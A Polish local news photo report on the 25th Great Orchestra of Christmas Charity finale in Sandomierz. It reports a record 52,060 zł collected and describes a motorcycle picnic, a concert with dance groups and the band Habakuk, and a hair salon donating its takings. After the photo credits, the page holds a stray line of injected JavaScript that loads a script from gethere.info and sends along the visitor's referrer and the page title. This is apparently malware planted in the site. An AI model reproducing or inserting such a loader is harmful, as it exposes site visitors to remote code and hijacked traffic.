Fotorelacje

Zeszłoroczny rekord został pobity. Sukces WOŚP w Sandomierzu

Zeszłoroczny rekord został pobity. Sukces WOŚP w Sandomierzu

52 060 zł to kwota jaką wolontariusze Wielkiej Orkiestry Świątecznej Pomocy zebrali podczas 25 finału w Sandomierzu. Zeszłoroczny rekord został pobity o ponad 10 tys. zł. Sandomierską zbiórkę wspierali motocykliści i fryzjerzy.

Podczas pikniku motocyklowo- samochodowego na Rynku Starego Miasta zebrano 1462 zł. Darmowa przejażdżka motorem lub zabytkowym autem była formą podziękowania za datek wrzucony do puszki Wielkiej Orkiestry Świątecznej Pomocy.

Sandomierzanie byli w tym roku bardzo hojni. Wolontariusze zebrali na terenie całego miasta 36 499 zł. Piotr Grudzień był wolontariuszem, który zgromadził rekordową sumę. W jego puszce było ponad 6 tys. zł.

Na Hali Widowiskowo-Sportowej MOSiR przy ul. Patkowskiego 2a odbyła się impreza kulturalna, której towarzyszyła zbiórka pieniędzy. Organizatorzy przygotowali bogaty program artystyczny. Zaprezentowały się m.in. wszystkie formacje taneczne z Fabryki Ruchu. Najmłodsi tancerze w wieku 2,5-3 lat poruszyli widzów do łez. Wiele emocji wywołał pokaz sztuk walk w wykonaniu Sandomierskiego Klubu Karate Kyokushin. Gwiazdą wieczoru był zespół Habakuk, który swoimi  reggae hitami wprowadził do Hali bardzo pozytywną atmosferę. Podczas imprezy licytowano gadżety WOŚP oraz inne fanty przekazane przez darczyńców. W zamian za datek wrzucony do puszki uczestnicy mogli zjeść ciepłą grochówkę lub ciasto. Zebrano w ten sposób. 14 099zł.

Salon „”Fryzjernia” przy ul. 11 Listopada 6 w Sandomierzu również wspierał zbiórkę. Pracownicy „Fryzjerni” przez cały dzień byli wolontariuszami Orkiestry. Goście salonu równowartość wynagrodzenia za usługę wrzucali bezpośrednio do puszki WOŚP. Akcja cieszyła się dużym zainteresowaniem.

Na zakończenie wydarzenia organizatorzy imprezy odpalili Światełko do Nieba, czyli pokaz sztucznych ogni.

Przypomnijmy, że w tym roku zbierano pieniądze na ratowanie życia i zdrowia dzieci na oddziałach pediatrycznych oraz na godną opiekę medyczną dla seniorów.

Tekst: Kinga Kędziora Palińska

Zdjęcia: Kinga Kędziora Palińska/ Sandomierskie Centrum Kultury

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Fotorelacje

Więcej w Fotorelacje

III Bieg Szklarski

tsa24.com27 września 2021

XII Triathlon Ziemi Sandomierskiej- Fotorelacja

tsa24.com23 sierpnia 2021

Klimontów – Kryształowe Berło dla Mirosława Baki

tsa24.com7 lipca 2021

Sandomierz w miniony weekend powitał wakacje

tsa24.com5 lipca 2021

XVI Turniej Halowej Piłki Nożnej o Puchar Burmistrza Miasta i Gminy Koprzywnica

tsa24.com3 marca 2020

Bal Mistrzów Sportu. Fotorelacja

tsa24.com10 lutego 2020

BEZPIECZEŃSTWO PODCZAS 28. FINAŁU WIELKIEJ ORKIESTRY ŚWIĄTECZNEJ POMOCY

tsa24.com9 stycznia 2020

NIETRZEŹWI KIEROWCY NA SANDOMIERSKICH DROGACH

tsa24.com3 stycznia 2020

Niezapomniana noc z gwiazdami sportu – fotorelacja

tsa24.com11 lutego 2019